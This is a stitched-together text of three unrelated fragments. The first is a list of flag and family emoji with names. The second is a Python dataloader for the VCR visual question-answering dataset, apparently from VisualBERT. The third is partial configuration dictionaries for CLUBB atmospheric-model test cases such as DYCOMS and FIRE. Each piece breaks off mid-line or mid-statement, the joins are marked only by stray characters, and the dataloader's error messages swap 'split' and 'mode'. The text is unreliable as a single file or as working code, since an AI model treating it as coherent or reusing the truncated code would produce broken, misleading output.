🏴 Flag for Delta Amacuro (VE-Y)
🏴 Flag for Stepanakert (AZ-XA)
🏴 Flag for Yardymli (AZ-YAR)
🏴 Flag for Yevlakh District (AZ-YEV)
🏴 Flag for Zaqatala (AZ-ZAQ)
👩🏾👶🏾 Family - Woman: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
🏴 Flag for Yevlakh (AZ-YE)
🏴 Flag for Federation of Bosnia and Herzegovina (BA-BIH)
🏴 Flag for Zardab (AZ-ZAR)
🏴 Flag for Salyan (AZ-SAL)
🏴 Flag for Zug (CH-ZG)
👨🏾👩🏾👧🏾👶🏾 Family - Man: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
👨🏿👩🏿👧🏿👶🏿 Family - Man: Dark Skin Tone, Woman: Dark Skin Tone, Girl: Dark Skin Tone, Baby: Dark Skin Tone
👩🏿👶🏿 Family - Woman: Dark Skin Tone, Baby: Dark Skin Tone
🏴 Flag for Republika Srpska (BA-SRP)
👨🏽❤️👩 Couple With Heart - Man: Medium Skin Tone, Woman
👨🏻👩🏻👶🏻 Family - Man: Light Skin Tone, Woman: Light Skin Tone, Baby: Light Skin Tone
🏴 Flag for Andalusia (ES-AN)
👨🏼👩🏼👶🏼 Family - Man: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
🏴 Flag for Saint James (BB-04)
👨🏾❤️👩🏼 Couple With Heart - Man: Medium-Dark Skin Tone, Woman: Medium-Light Skin Tone
🏴 Flag for Saint George (BB-03)
🏴 Flag for Saint Andrew (BB-02)
👨👩👶👦 Family: Man, Woman, Baby, Boy
👨🏽👩🏽👶🏽 Family - Man: Medium Skin Tone, Woman: Medium Skin Tone, Baby: Medium Skin Tone
🏴 Flag for Saint John (BB-05)
👨🏾👩🏾👶🏾 Family - Man: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
🏴 Flag for Saint Joseph (BB-06)
🏴 Flag for Western (LK-1)
🏴 Flag for Brest (BY-BR)
🏴 Flag for Shamkir (AZ-SKR)
🏴 Flag for Saint Lucy (BB-07)
👩🏻👶🏻👦🏻 Family - Woman: Light Skin Tone, Baby: Light Skin Tone, Boy: Light Skin Tone
🏴 Flag for Castile-La Mancha (ES-CM)
🏴 Flag for Saint Philip (BB-10)
🏴 Flag for Saint George (VC-04)
👨🏻👩🏻👶🏻👦🏻 Family - Man: Light Skin Tone, Woman: Light Skin Tone, Baby: Light Skin Tone, Boy: Light Skin Tone
👩🏻👧🏻👧🏻 Family - Woman: Light Skin Tone, Girl: Light Skin Tone, Girl: Light Skin Tone
🏴 Flag for Barisal (BD-A)
🏴 Flag for Zangilan (AZ-ZAN)
🏴 Flag for Kingston (JM-01)
👨🏼👩🏼👶🏼👦🏼 Family - Man: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
🏴 Flag for Rajshahi Division (BD-E)
🏴 Flag for Rangpur Division (BD-F)
🏴 Flag for Dhaka Division (BD-C)
🏴 Flag for Khulna Division (BD-D)
🏴 Flag for Saint Peter (BB-09)
🏴 Flag for Lenart (SI-058)
👩🏼👶🏼 Family - Woman: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
🏴 Flag for Cascades (BF-02)
🏴 Flag for Mymensingh Division (BD-H)
🏴 Flag for Wallonia (BE-WAL)
🏴 Flag for Beau-Bassin Rose-Hill (MU-BR)
🏴 Flag for Centre-Est (BF-04)
🏴 Flag for Hong Kong SAR China (CN-91)
🏴 Flag for Boucle du Mouhoun (BF-01)
🏴 Flag for Centre (BF-03)
🏴 Flag for Central Denmark (DK-82)
🏴 Flag for Centre-Sud (BF-07)
👨🏽👩🏽👶🏽👦🏽 Family - Man: Medium Skin Tone, Woman: Medium Skin Tone, Baby: Medium Skin Tone, Boy: Medium Skin Tone
🏴 Flag for Centre-Ouest (BF-06)
🏴 Flag for Centre-Nord (BF-05)
🏴 Flag for Saint Michael (BB-08)
🏴 Flag for Saint Thomas (BB-11)
👨🏽❤️👩🏿 Couple With Heart - Man: Medium Skin Tone, Woman: Dark Skin Tone
🏴 Flag for Est (BF-08)
🏴 Flag for Brussels (BE-BRU)
🏴 Flag for Sylhet Division (BD-G)
🏴 Flag for Plateau-Central (BF-11)
🏴 Flag for Chittagong Division (BD-B)
🏴 Flag for Sud-Ouest (BF-13)
👨🏾👩🏾👶🏾👦🏾 Family - Man: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
🏴 Flag for Vidin (BG-05)
🏴 Flag for Varna (BG-03)
👨🏿❤️👩🏽 Couple With Heart - Man: Dark Skin Tone, Woman: Medium Skin Tone
🏴 Flag for Burgas (BG-02)
🏴 Flag for Nord (BF-10)
🏴 Flag for Veliko Tarnovo (BG-04)
👨🏽👩🏽👧🏽👧🏽 Family - Man: Medium Skin Tone, Woman: Medium Skin Tone, Girl: Medium Skin Tone, Girl: Medium Skin Tone
🏴 Flag for Gabrovo (BG-07)
👨🏿👩🏿👶🏿👦🏿 Family - Man: Dark Skin Tone, Woman: Dark Skin Tone, Baby: Dark Skin Tone, Boy: Dark Skin Tone
🏴 Flag for Dobrich (BG-08)
🏴 Flag for Sahel (BF-12)
🏴 Flag for Tasmania (AU-TAS)
👨🏿❤️👩🏻 Couple With Heart - Man: Dark Skin Tone, Woman: Light Skin Tone
👩🏻👧🏻👦🏻 Family - Woman: Light Skin Tone, Girl: Light Skin Tone, Boy: Light Skin Tone
👨🏻👩🏻👶🏻👧🏻 Family - Man: Light Skin Tone, Woman: Light Skin Tone, Baby: Light Skin Tone, Girl: Light Skin Tone
👨🏼👩🏼👶🏼👧🏼 Family - Man: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
👨🏾❤️💋👩🏾 Kiss - Man: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone
🏴 Flag for Khojavend (AZ-XVD)
🏴 Flag for Lovech (BG-11)
🏴 Flag for Libertador General Bernardo O’Higgins (CL-LI)
🏴 Flag for Pazardzhik (BG-13)
👨🏿❤️👩🏿 Couple With Heart - Man: Dark Skin Tone, Woman: Dark Skin Tone
🏴 Flag for Pernik (BG-14)
🏴 Flag for Kyustendil (BG-10)
🏴 Flag for Red Sea (EG-BA)
🏴 Flag for Zanzibar Central/South (TZ-11)
👨🏿👩🏿👧🏿👦🏿 Family - Man: Dark Skin Tone, Woman: Dark Skin Tone, Girl: Dark Skin Tone, Boy: Dark Skin Tone
🏴 Flag for Pleven (BG-15)
👨🏿👨🏿👦🏿👦🏿 Family - Man: Dark Skin Tone, Man: Dark Skin Tone, Boy: Dark Skin Tone, Boy: Dark Skin | |
# Modified from R2C
"""
Dataloaders for VCR
"""
import json
import pickle
import os
from collections import defaultdict
import numpy as np
import numpy
import torch
from allennlp.data.dataset import Batch
from allennlp.data.fields import TextField, ListField, LabelField, SequenceLabelField, ArrayField, MetadataField
from allennlp.data.instance import Instance
from allennlp.data.token_indexers import ELMoTokenCharactersIndexer
from allennlp.data.tokenizers import Token
from allennlp.data.vocabulary import Vocabulary
from allennlp.nn.util import get_text_field_mask
from torch.utils.data import Dataset
from dataloaders.box_utils import load_image, resize_image, to_tensor_and_normalize
from dataloaders.mask_utils import make_mask
from dataloaders.bert_field import BertField
import h5py
from copy import deepcopy
from tqdm import tqdm
from .vcr_data_utils import data_iter, data_iter_test, data_iter_item
from .bert_data_utils import InputExample, InputFeatures, get_one_image_feature_npz_screening_parameters, get_image_feat_reader, faster_RCNN_feat_reader, screen_feature
from .bert_field import IntArrayField
from visualbert.pytorch_pretrained_bert.fine_tuning import _truncate_seq_pair, random_word
from visualbert.pytorch_pretrained_bert.tokenization import BertTokenizer
GENDER_NEUTRAL_NAMES = ['Casey', 'Riley', 'Jessie', 'Jackie', 'Avery', 'Jaime', 'Peyton', 'Kerry', 'Jody', 'Kendall',
'Peyton', 'Skyler', 'Frankie', 'Pat', 'Quinn']
# Here's an example jsonl
# {
# "movie": "3015_CHARLIE_ST_CLOUD",
# "objects": ["person", "person", "person", "car"],
# "interesting_scores": [0],
# "answer_likelihood": "possible",
# "img_fn": "lsmdc_3015_CHARLIE_ST_CLOUD/3015_CHARLIE_ST_CLOUD_00.23.57.935-00.24.00.783@0.jpg",
# "metadata_fn": "lsmdc_3015_CHARLIE_ST_CLOUD/3015_CHARLIE_ST_CLOUD_00.23.57.935-00.24.00.783@0.json",
# "answer_orig": "No she does not",
# "question_orig": "Does 3 feel comfortable?",
# "rationale_orig": "She is standing with her arms crossed and looks disturbed",
# "question": ["Does", [2], "feel", "comfortable", "?"],
# "answer_match_iter": [3, 0, 2, 1],
# "answer_sources": [3287, 0, 10184, 2260],
# "answer_choices": [
# ["Yes", "because", "the", "person", "sitting", "next", "to", "her", "is", "smiling", "."],
# ["No", "she", "does", "not", "."],
# ["Yes", ",", "she", "is", "wearing", "something", "with", "thin", "straps", "."],
# ["Yes", ",", "she", "is", "cold", "."]],
# "answer_label": 1,
# "rationale_choices": [
# ["There", "is", "snow", "on", "the", "ground", ",", "and",
# "she", "is", "wearing", "a", "coat", "and", "hate", "."],
# ["She", "is", "standing", "with", "her", "arms", "crossed", "and", "looks", "disturbed", "."],
# ["She", "is", "sitting", "very", "rigidly", "and", "tensely", "on", "the", "edge", "of", "the",
# "bed", ".", "her", "posture", "is", "not", "relaxed", "and", "her", "face", "looks", "serious", "."],
# [[2], "is", "laying", "in", "bed", "but", "not", "sleeping", ".",
# "she", "looks", "sad", "and", "is", "curled", "into", "a", "ball", "."]],
# "rationale_sources": [1921, 0, 9750, 25743],
# "rationale_match_iter": [3, 0, 2, 1],
# "rationale_label": 1,
# "img_id": "train-0",
# "question_number": 0,
# "annot_id": "train-0",
# "match_fold": "train-0",
# "match_index": 0,
# }
class VCR(Dataset):
def __init__(self,
split,
mode,
region_keywords="any",
scene="none",
single_or_multiple="single",
only_use_relevant_dets=True,
add_image_as_a_box=True,
conditioned_answer_choice=0,
do_lower_case=True,
bert_model_name="",
max_seq_length=128,
pretraining=False,
pretraining_include_qa_and_qar=False,
complete_shuffle=False,
use_alignment=False,
add_all_features=False,
answer_labels_path=None,
vcr_annots_dir = None,
vcr_image_dir = None
):
self.split = split
self.mode = mode
self.only_use_relevant_dets = only_use_relevant_dets
self.pretraining_include_qa_and_qar = pretraining_include_qa_and_qar
self.add_all_features = add_all_features
self.use_alignment = use_alignment
self.add_image_as_a_box = add_image_as_a_box
self.conditioned_answer_choice = conditioned_answer_choice
self.vcr_annots_dir = vcr_annots_dir
self.vcr_image_dir = vcr_image_dir
with open(os.path.join(self.vcr_annots_dir, '{}.jsonl'.format(split)), 'r') as f:
temp = [json.loads(s) for s in f]
items_temp = []
if "val" in split and region_keywords != "any" and "orig" not in split:
for item in temp:
if region_keywords in item["region"]:
items_temp.append(item)
else:
items_temp = temp
if scene != "none" and (split == "val" or split == "orig_val"):
self.items = []
for item in items_temp:
if split == "val":
if scene in item["keywords"]:
self.items.append(item)
else:
right_answer = item["answer_choices"][item["answer_label"]]
right_rationale = item["rationale_choices"][item["rationale_label"]]
if scene in right_answer or scene in right_rationale:
self.items.append(item)
else:
self.items = items_temp
if "val" in split and "orig" not in split:
temp = self.items
if split == 'val_addition_single' and single_or_multiple == "multiple":
image_fn_list = [item["img_fn"] for item in temp]
with open(os.path.join(self.vcr_annots_dir, 'val.jsonl'), 'r') as f:
temp_val = [json.loads(s) for s in f]
temp = []
for item in temp_val:
if item["img_fn"] in image_fn_list:
temp.append(item)
self.items = temp
if split not in ('test', 'train', 'orig_val', 'val', 'val_addition_single'):
raise ValueError("Mode must be in test, train, orig_val, val, or val_addition_single. Supplied {}".format(mode))
if mode not in ('answer', 'rationale'):
raise ValueError("split must be answer or rationale")
self.vocab = Vocabulary()
with open('cocoontology.json', 'r') as f:
coco = json.load(f)
self.coco_objects = ['__background__'] + [x['name'] for k, x in sorted(coco.items(), key=lambda x: int(x[0]))]
self.coco_obj_to_ind = {o: i for i, o in enumerate(self.coco_objects)}
self.do_lower_case = do_lower_case
self.bert_model_name = bert_model_name
self.max_seq_length = max_seq_length
self.tokenizer = BertTokenizer.from_pretrained(self.bert_model_name, do_lower_case=self.do_lower_case)
self.pretraining = pretraining
self.masked_lm_prob = 0.15
self.max_predictions_per_seq = 20
self.complete_shuffle = complete_shuffle
self.only_qar = self.mode == 'rationale'
if answer_labels_path is not None:
assert(self.only_qar)
if answer_labels_path in (0, 1, 2, 3):
for i in self.items:
i["answer_label"] = answer_labels_path
else:
self.answer_labels = np.load(answer_labels_path)
self.answer_labels = self.answer_labels.argmax(1)
if self.split == "test":
assert(self.answer_labels.shape[0] == len(self))
for index, i in enumerate(self.items):
i["answer_label"] = self.answer_labels[index]
else:
self.answer_labels = None
@property
def is_train(self):
return self.split == 'train'
@classmethod
def splits(cls, **kwargs):
""" Helper method to generate splits of the dataset"""
kwargs_copy = dict(kwargs)
if 'mode' not in kwargs:
kwargs_copy['mode'] = 'answer'
train = cls(split='train', **kwargs_copy)
orig_val = cls(split='orig_val', **kwargs_copy)
val = cls(split='val', **kwargs_copy)
val_addition = cls(split='val_addition_single', **kwargs_copy)
test = cls(split='test', **kwargs_copy)
return train, orig_val, val, val_addition, test
def __len__(self):
if self.complete_shuffle:
if self.pretraining_include_qa_and_qar:
return len(self.items) * 8
else:
return len(self.items) * 4
return len(self.items)
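# With complete_shuffle, each item is expanded into its 4 answer choices
# (or 4 answers + 4 rationales when pretraining_include_qa_and_qar is set);
# __getitem__ below decodes the flat index back into (item index, choice index).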
def _get_dets_to_use(self, item, only_use_answer = False, only_use_qar = False): # Need to fix this match
"""
We might want to use fewer detectiosn so lets do so.
:param item:
:param question:
:param answer_choices:
:return:
"""
# Load questions and answers
question = item['question']
answer_choices = item['{}_choices'.format(self.mode)]
if self.mode == "answer":
question = item['question']
answer_choices = item['{}_choices'.format(self.mode)]
elif self.mode == "rationale":
question = item['question'] + item['answer_choices'][item['answer_label']]
answer_choices = item['{}_choices'.format(self.mode)]
if self.pretraining_include_qa_and_qar:
answer_choices = item['answer_choices'] + item['rationale_choices']
if self.add_all_features:
question = item['question']
answer_choices = item['answer_choices'] + item['rationale_choices']
if self.only_use_relevant_dets:
dets2use = np.zeros(len(item['objects']), dtype=bool)
people = np.array([x == 'person' for x in item['objects']], dtype=bool)
for sent in answer_choices + [question]:
for possibly_det_list in sent:
if isinstance(possibly_det_list, list):
for tag in possibly_det_list:
if tag >= 0 and tag < len(item['objects']): # sanity check
dets2use[tag] = True
elif possibly_det_list.lower() in ('everyone', 'everyones'):
dets2use |= people
if not dets2use.any():
dets2use |= people
else:
dets2use = np.ones(len(item['objects']), dtype=bool)
dets2use = np.where(dets2use)[0]
old_det_to_new_ind = np.zeros(len(item['objects']), dtype=np.int32) - 1
old_det_to_new_ind[dets2use] = np.arange(dets2use.shape[0], dtype=np.int32)
# If we add the image as an extra box then the 0th will be the image.
if self.add_image_as_a_box:
old_det_to_new_ind[dets2use] += 1
old_det_to_new_ind = old_det_to_new_ind.tolist()
return dets2use, old_det_to_new_ind
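# Worked example of the remapping above (illustrative values, not from a real
# item): objects = ['person', 'person', 'car'] and only tag 0 is referenced in
# the text. Then dets2use == [0] and old_det_to_new_ind == [1, -1, -1] when
# add_image_as_a_box is True (box 0 is reserved for the whole image), so tag 0
# is rewritten to point at box 1 while unused detections map to -1.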
def __getitem__(self, index):
if self.complete_shuffle:
if self.pretraining_include_qa_and_qar:
which = index % 8
index = index // 8
else:
which = index % 4
index = index // 4
else:
which = None
item = deepcopy(self.items[index])
###################################################################
# Load questions and answers
if self.complete_shuffle and which < 4:
only_use_answer = True
else:
only_use_answer = False
if self.complete_shuffle and which >= 4:
only_use_qar = True
else:
only_use_qar = False
dets2use, old_det_to_new_ind = self._get_dets_to_use(item, only_use_answer = only_use_answer, only_use_qar = only_use_qar)
instance_dict = {}
if self.split != 'test':
instance_dict['label'] = LabelField(item['{}_label'.format(self.mode)], skip_indexing=True)
if self.split == "train" or self.split == "test" or self.split == "orig_val":
instance_dict['metadata'] = MetadataField({'annot_id': item['annot_id'], 'ind': index, 'movie': item['movie'],
'img_fn': item['img_fn'],
'question_number': item['question_number']})
else:
instance_dict['metadata'] = MetadataField({'annot_id': item['annot_id'], 'ind': index, 'region': item['region'],
'img_fn': item['img_fn'],
'question_number': item['question_number']})
###################################################################
# Load image now and rescale it. Might have to subtract the mean and whatnot here too.
image = load_image(os.path.join(self.vcr_image_dir, item['img_fn']))
image, window, img_scale, padding = resize_image(image, random_pad=self.is_train)
image = to_tensor_and_normalize(image)
c, h, w = image.shape
###################################################################
# Load boxes.
with open(os.path.join(self.vcr_image_dir, item['metadata_fn']), 'r') as f:
metadata = json.load(f)
# [nobj, 14, 14]
'''if len(metadata['segms']) < dets2use[-1] + 1:
print(index, item['img_fn'], len(metadata['segms']), dets2use)'''
segms = np.stack([make_mask(mask_size=14, box=metadata['boxes'][i], polygons_list=metadata['segms'][i]) for i in dets2use])
# Chop off the final dimension, that's the confidence
boxes = np.array(metadata['boxes'])[dets2use, :-1]
# Possibly rescale them if necessary
boxes *= img_scale
boxes[:, :2] += np.array(padding[:2])[None]
boxes[:, 2:] += np.array(padding[:2])[None]
obj_labels = [self.coco_obj_to_ind[item['objects'][i].replace(" ","")] for i in dets2use.tolist()]
if self.add_image_as_a_box:
boxes = np.row_stack((window, boxes))
segms = np.concatenate((np.ones((1, 14, 14), dtype=np.float32), segms), 0)
obj_labels = [self.coco_obj_to_ind['__background__']] + obj_labels
examples = data_iter_item(item, tokenizer=self.tokenizer,
max_seq_length=self.max_seq_length,
endingonly=False,
include_qar = self.pretraining_include_qa_and_qar,
only_qar = self.only_qar)
self.getitem_bert_part(examples, item, instance_dict, which)
if self.use_alignment: # Alignment between objects and text
######################
examples_alginment_pack = []
for i in range(len(examples)):
if self.pretraining_include_qa_and_qar:
if i < 4:
raw_text_a = item["question"]
raw_text_b | |
None,
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupIceMP]}
CLEX9_OCT14 = {'name': 'clex9_oct14',
'description': "",
'start_time': 181, 'end_time': 240,
'height_min_value': 2230, 'height_max_value': 6688,
'blacklisted_vars': ['Ngm'],
'sam_benchmark_file': None,
'clubb_file': {'zm': clubb_output_root + '/clex9_oct14_zm.nc',
'zt': clubb_output_root + '/clex9_oct14_zt.nc',
'sfc': clubb_output_root + '/clex9_oct14_sfc.nc'},
'coamps_benchmark_file': {'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/clex9_oct14_coamps_sm.nc",
'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/clex9_oct14_coamps_sw.nc"},
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupIceMP]}
DYCOMS2_RF01 = {'name': 'dycoms2_rf01',
'description': "",
'start_time': 181, 'end_time': 240,
'height_min_value': 0, 'height_max_value': 1200,
'blacklisted_vars': [],
'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT +
"/JULY_2017/DYCOMS_RF01_96x96x320/DYCOMS_RF01_96x96x320.nc"},
'clubb_file': {'zm': clubb_output_root + '/dycoms2_rf01_zm.nc',
'zt': clubb_output_root + '/dycoms2_rf01_zt.nc',
'sfc': clubb_output_root + '/dycoms2_rf01_sfc.nc'},
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': {'zm': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf01_zm.nc',
'zt': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf01_zt.nc',
'sfc': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf01_sfc.nc'},
'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + '/dycoms2_rf01_zm.nc',
'zt': HOC_OUTPUT_ROOT + '/dycoms2_rf01_zt.nc',
'sfc': HOC_OUTPUT_ROOT + '/dycoms2_rf01_sfc.nc'},
'e3sm_file': { 'e3sm': e3sm_output_root + "/dycoms2_rf01.nc"},
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupWs]}
DYCOMS2_RF01_FIXED_SST = {'name': 'dycoms2_rf01_fixed_sst',
'description': "Copied from plotgen: Ran with a 5 min timestep and a 48-level grid",
'start_time': 2520, 'end_time': 2700,
'height_min_value': 0, 'height_max_value': 1200,
'blacklisted_vars': ['rtp3', 'Skrt_zt', 'Skthl_zt', 'rtpthvp', 'thlpthvp'],
'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT +
"/SAM6.6/DYCOMS_RF01_fixed_sst/DYCOMS_RF01_96x96x320_LES_fixed_sst.nc"},
'clubb_file': {'zm': clubb_output_root + '/dycoms2_rf01_fixed_sst_zm.nc',
'zt': clubb_output_root + '/dycoms2_rf01_fixed_sst_zt.nc',
'sfc': clubb_output_root + '/dycoms2_rf01_fixed_sst_sfc.nc'},
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase]}
DYCOMS2_RF02_DO = {'name': 'dycoms2_rf02_do',
'description': "",
'start_time': 301, 'end_time': 360,
'height_min_value': 0, 'height_max_value': 1200,
'blacklisted_vars': [],
'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT +
"/JULY_2017/DYCOMS_RF02_128x128x96_dr_nosed/DYCOMS_RF02_128x128x96_dr_nosed.nc"},
'clubb_file': {'zm': clubb_output_root + '/dycoms2_rf02_do_zm.nc',
'zt': clubb_output_root + '/dycoms2_rf02_do_zt.nc',
'sfc': clubb_output_root + '/dycoms2_rf02_do_sfc.nc'},
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': {'zm': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_do_zm.nc',
'zt': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_do_zt.nc',
'sfc': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_do_sfc.nc'},
'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + '/dycoms2_rf02_do_zm.nc',
'zt': HOC_OUTPUT_ROOT + '/dycoms2_rf02_do_zt.nc',
'sfc': HOC_OUTPUT_ROOT + '/dycoms2_rf02_do_sfc.nc'},
'e3sm_file': None,
'cam_file': None,
'sam_file': {'sam': sam_output_root + "/DYCOMS_RF02_SAM_CLUBB.nc"},
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupWs, VariableGroupLiquidMP, VariableGroupCorrelations,
VariableGroupKKMP]}
DYCOMS2_RF02_DS = {'name': 'dycoms2_rf02_ds',
'description': "",
'start_time': 301, 'end_time': 360,
'height_min_value': 0, 'height_max_value': 1200,
'blacklisted_vars': [],
'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT +
"/JULY_2017/DYCOMS_RF02_128x128x96_dr_sed/DYCOMS_RF02_128x128x96_dr_sed.nc"},
'clubb_file': {'zm': clubb_output_root + '/dycoms2_rf02_ds_zm.nc',
'zt': clubb_output_root + '/dycoms2_rf02_ds_zt.nc',
'sfc': clubb_output_root + '/dycoms2_rf02_ds_sfc.nc'},
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + '/dycoms2_rf02_ds_zm.nc',
'zt': HOC_OUTPUT_ROOT + '/dycoms2_rf02_ds_zt.nc',
'sfc': HOC_OUTPUT_ROOT + '/dycoms2_rf02_ds_sfc.nc'},
'e3sm_file': {'e3sm': e3sm_output_root + "/dycoms2_rf02_ds.nc"},
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupWs, VariableGroupLiquidMP, VariableGroupCorrelations,
VariableGroupKKMP]}
DYCOMS2_RF02_ND = {'name': 'dycoms2_rf02_nd',
'description': "Copied from plotgen: ** Generated by doing a restart run after 7200 seconds. Note: "
"t = 0 corresponds to start time of the restart run, not the original run. ** ",
'start_time': 301, 'end_time': 360,
'height_min_value': 0, 'height_max_value': 1200,
'blacklisted_vars': ['wprrp', 'wpNrp', 'corr_w_rr_1', 'corr_w_Nr_1'],
'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT +
"/JULY_2017/DYCOMS_RF02_128x128x96_nodr_nosed/DYCOMS_RF02_128x128x96_nodr_nosed.nc"},
'clubb_file': {'zm': clubb_output_root + '/dycoms2_rf02_nd_zm.nc',
'zt': clubb_output_root + '/dycoms2_rf02_nd_zt.nc',
'sfc': clubb_output_root + '/dycoms2_rf02_nd_sfc.nc'},
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': {'zm': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_nd_zm.nc',
'zt': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_nd_zt.nc',
'sfc': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_nd_sfc.nc'},
'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + '/dycoms2_rf02_nd_zm.nc',
'zt': HOC_OUTPUT_ROOT + '/dycoms2_rf02_nd_zt.nc',
'sfc': HOC_OUTPUT_ROOT + '/dycoms2_rf02_nd_sfc.nc'},
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupWs, VariableGroupLiquidMP, VariableGroupKKMP]}
DYCOMS2_RF02_DS_RESTART = {'name': 'dycoms2_rf02_ds_restart',
'description': "Copied from plotgen: ** Uniform, coarse verticle grid spacing of 40 m. **",
'start_time': 181, 'end_time': 240,
'height_min_value': 0, 'height_max_value': 1200,
'blacklisted_vars': [],
'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT +
"/JULY_2017/DYCOMS_RF02_128x128x96_dr_sed/DYCOMS_RF02_128x128x96_dr_sed.nc"},
'clubb_file': {'zm': clubb_output_root + '/dycoms2_rf02_ds_restart_zm.nc',
'zt': clubb_output_root + '/dycoms2_rf02_ds_restart_zt.nc',
'sfc': clubb_output_root + '/dycoms2_rf02_ds_restart_sfc.nc'},
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': {'zm': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_ds_zm.nc',
'zt': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_ds_zt.nc',
'sfc': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_ds_sfc.nc'},
'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + '/dycoms2_rf02_ds_zm.nc',
'zt': HOC_OUTPUT_ROOT + '/dycoms2_rf02_ds_zt.nc',
'sfc': HOC_OUTPUT_ROOT + '/dycoms2_rf02_ds_sfc.nc'},
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupWs, VariableGroupLiquidMP,
VariableGroupCorrelations, VariableGroupKKMP]}
DYCOMS2_RF02_SO = {'name': 'dycoms2_rf02_so',
'description': "Copied from plotgen: " +
"** WRF-type stretched (unevenly spaced) grid (grid_type = 3) ** ",
'start_time': 301, 'end_time': 360,
'height_min_value': 0, 'height_max_value': 1200,
'blacklisted_vars': ['wprrp', 'wpNrp'],
'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT +
"/JULY_2017/DYCOMS_RF02_128x128x96_nodr_sed/DYCOMS_RF02_128x128x96_nodr_sed.nc"},
'clubb_file': {'zm': clubb_output_root + '/dycoms2_rf02_so_zm.nc',
'zt': clubb_output_root + '/dycoms2_rf02_so_zt.nc',
'sfc': clubb_output_root + '/dycoms2_rf02_so_sfc.nc'},
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': {'zm': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_so_zm.nc',
'zt': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_so_zt.nc',
'sfc': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf02_so_sfc.nc'},
'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + '/dycoms2_rf02_so_zm.nc',
'zt': HOC_OUTPUT_ROOT + '/dycoms2_rf02_so_zt.nc',
'sfc': HOC_OUTPUT_ROOT + '/dycoms2_rf02_so_sfc.nc'},
'e3sm_file': None,
'cam_file': None,
'sam_file': {'sam': sam_output_root + "/DYCOMS_RF02_SAM_CLUBB.nc"},
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupWs, VariableGroupLiquidMP, VariableGroupKKMP]}
FIRE = {'name': 'fire',
'description': "",
'start_time': 61, 'end_time': 120,
